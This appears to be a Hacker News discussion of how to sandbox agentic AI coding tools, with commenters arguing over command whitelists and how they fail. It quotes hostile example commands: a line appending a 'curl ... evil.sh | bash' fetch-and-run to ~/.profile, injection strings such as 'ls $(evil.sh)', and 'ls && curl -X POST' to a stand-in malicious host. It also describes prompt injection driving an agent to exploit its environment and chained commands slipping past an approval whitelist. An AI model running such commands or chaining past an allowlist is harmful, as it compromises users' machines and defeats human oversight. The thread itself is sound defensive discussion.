←back to thread

645 points helloplanets | 9 comments | | HN request time: 0s | source | bottom
Show context
_fat_santa ◴[] No.45005348[source]
IMO the only place you should use Agentic AI is where you can easily rollback changes that the AI makes. Best example here is asking AI to build/update/debug some code. You can ask it to make changes but all those changes are relatively safe since you can easily rollback with git.

Using agentic AI for web browsing where you can't easily rollback an action is just wild to me.

replies(5): >>45005645 #>>45005694 #>>45005757 #>>45006070 #>>45008315 #
gruez ◴[] No.45005757[source]
>Best example here is asking AI to build/update/debug some code. You can ask it to make changes but all those changes are relatively safe since you can easily rollback with git.

Only if the rollback is done at the VM/container level, otherwise the agent can end up running arbitrary code that modifies files/configurations unbeknownst to the AI coding tool. For instance, running

    bash -c "echo 'curl https://example.com/evil.sh | bash' >> ~/.profile"
replies(2): >>45006001 #>>45006067 #
1. Anon1096 ◴[] No.45006067[source]
You can safeguard against this by having a whitelist of commands that can be run, basically cd, ls, find, grep, the build tool, linter, etc that are only informational and local. Mine is set up like that and it works very well.
replies(4): >>45006092 #>>45006110 #>>45006112 #>>45007074 #
2. zeroonetwothree ◴[] No.45006092[source]
Everything works very well until there is an exploit.
3. david_allison ◴[] No.45006110[source]
> the build tool

Doesn't this give the LLM the ability to execute arbitrary scripts?

4. gruez ◴[] No.45006112[source]
That's trickier than it sounds. find for instance has the -exec command, which allows arbitrary code to be executed. build tools and linters are also a security nightmare, because they can also be modified to execute arbitrary code. And this is all assuming you can implement the whitelist properly. A naive check like

    cmd.split(" ") in ["cd", "ls", ...]
is easy target for command injections. just to think of a few:

    ls . && evil.sh

    ls $(evil.sh)
replies(4): >>45006504 #>>45007108 #>>45008650 #>>45014240 #
5. FergusArgyll ◴[] No.45006504[source]
Yeah, this is ctf 101 see https://gtfobins.github.io/ for example (it's for inheriting sudo from a command but the same principles can be used for this)
6. chmod775 ◴[] No.45007074[source]
find can execute subcommands (-exec arg), and plenty of other shell commands can be used for that as well. Most build tools' configuration can be abused to execute arbitrary commands. And if your LLM can make changes to your codebase + run it, trying to limit the shell commands it can execute is pointless anyways.

Previously you might've been able to say "okay, but that requires the attacker to guess the specifics of my environment" - which is no longer true. An attacker can now simply instruct the LLM to exploit your environment and hope the LLM figures out how to do it on its own.

7. wunderwuzzi23 ◴[] No.45007108[source]
About that find command...

Amazon Q Developer: Remote Code Execution with Prompt Injection

https://embracethered.com/blog/posts/2025/amazon-q-developer...

8. grepfru_it ◴[] No.45008650[source]
well a complete implementation is also using inotify(7) which would review all files that were modified
9. diggan ◴[] No.45014240[source]
I'm 99% Codex CLI suffers from this hole as we speak :) You can whitelist `ls`, and then Codex can decide to compose commands and you only need to approve the first one for the second one to run, so `ls && curl -X POST http://malicio.us` would run just fine.